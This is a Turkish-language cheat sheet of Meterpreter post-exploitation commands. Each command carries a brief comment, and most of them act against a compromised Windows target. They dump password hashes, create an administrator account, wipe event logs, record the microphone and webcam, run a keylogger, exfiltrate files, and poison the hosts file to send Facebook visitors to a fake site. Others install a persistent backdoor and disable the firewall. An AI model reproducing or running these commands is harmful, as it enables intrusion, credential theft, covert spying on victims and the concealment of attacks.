Meterpreter oturumu komutları
Code:
METERPRETER OTURUMUNDA KULLANILABİLECEK KOMUTLAR
İpconfig --a
//Hedef sistem Üzerinde İp bilgilerini öğrenmek İçin Kullanılabilir.
sysinfo
//Hedef Sistem Hakkında Bilgi Alınır.
getuid
//Hangi Kullanıcı İle Erişim Yapıldığını Gösterir.
getpid
//Mevcut Sistem Pid Numarasını Gösterir
run hashdump
//Hedef Sistemdeki Kullanıcıların Şifre Hashleri Elde Edilir.
shell
net user test sifre (add
net user test /active:yes
net localgroup Administrators test /add
//Shell Komutu ile Windows shell’e geçeriz daha sonra komut arayüzünde iken net komutu
ile yeni kullanıcı oluşturabiliriz.
clearev
//Hedef Sistemdeki event loğlarını silmek için kullanabiliriz.
run event_manager –c
//Hedef sistemdeki event loglari silmek için bu komutuda kullanabiliriz.screenshot –p /root/ekrangoruntusu.jpeg –q 60
//screenshot komutu ile hedef sistemin ekran goruntusunu alabiliriz.
record_mic –d 60 -f /root/seskaydi.wav
//record_mic komutu ile hedef sistemin etkin olan mikrofonunu kullanarak ortam dinlemesi
yapılabilir.
webcam_list
//hedef sistemdeki kameralar listelenir.
webcam_snap -p /root/kameragoruntusu.jpeg -q 60 -v false
//hedef sistemin webcami kullnılarak goruntuler alınır.
pwd
//Bulunulan dizinin ismini verir.
run keylogrecorder
//Hedef Sisteme Keylogger yükleyebiliriz.
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.10.101_1212122.txt
//keyloggerı hedef sistemde çalıştırdıktan sonra kaydedilen dosyadan hedef sistemle ilgili
bilgileri görebilirsiniz.
Run Komutu İle Kullanabileceğimiz scriptleri:
/opt/framework/msf3/scripts/meterpreter Dizini altında Bulabiliriz.run winenum
//winenum scriptni ; hedef Windows sistem üzerinde çalıştırabileceğimiz bir çok komutu otamatik
çalıştırarark sonuçları bir dosyaya kaydeder.Böylelikle otamatik şekilde gerekli bilgileri elde edebiliriz.
upload /root/dosya c:\Windows
//hedef sisteme kali sunucudan dosya upload edebiliriz.
download f:\\iplisteleri.txt /root/
Hedef Sistemden İstediğimiz bir dosyayı kali sunucuya indirebiliriz.
run get_application_list
//Hedef Sistemdkei tüm uygulamaların ve versiyon bilgileri öğrenmek için bu scripti
kullanabiliriz.
run getgui -u ali –p 12345
//Getgui scriptini kullnarak belirttiğimiz kullanıcı rdp hakkı ile birlikte oluşturur.Artık bu
kullanıcı ile rdp yapabiliriz.
cat /root/sahtehostdosyasi.txt
192.168.10.23 facebook.com
192.168.10.23 www.facebook.com
run hostedit -l /rootsahtehostdosyasi.txt
//ilk önce kali komut arayüzündeyken sahtehostdosyasi oluşturulur sonra hostedit scripti //
ile bu dosyayı belirterek hedef sistemin host dosyası değiştirilmiş olur.
// Artık hedef sistemdeki kullanıcılar facebooka girdiğinde bizim sahte sitemize girebilirler.
run scraper
//hedef Makinada üzerindne otamatik bilgi toplamak için kullnılabilir.run metsvc
//Hedef Sistemde Kalıcı Arka Kapı Bırakmak için kullanılır.
cat /root/command.txt
sysinfo
checkvm
get local subnets
getuid
run multiscript -rc /root/command.txt
//Birden fazla komutu dosyaya kaydederek multiscript isimli script ile çalıştırabiliriz.
run Getcountermeasure
//Hedef Sistemde ki güvenlik duvarını kapatmak için kullanılır.
run getgui -e
//hedef sistemde rdp’yi Enable Etmek İçin Kullanılır.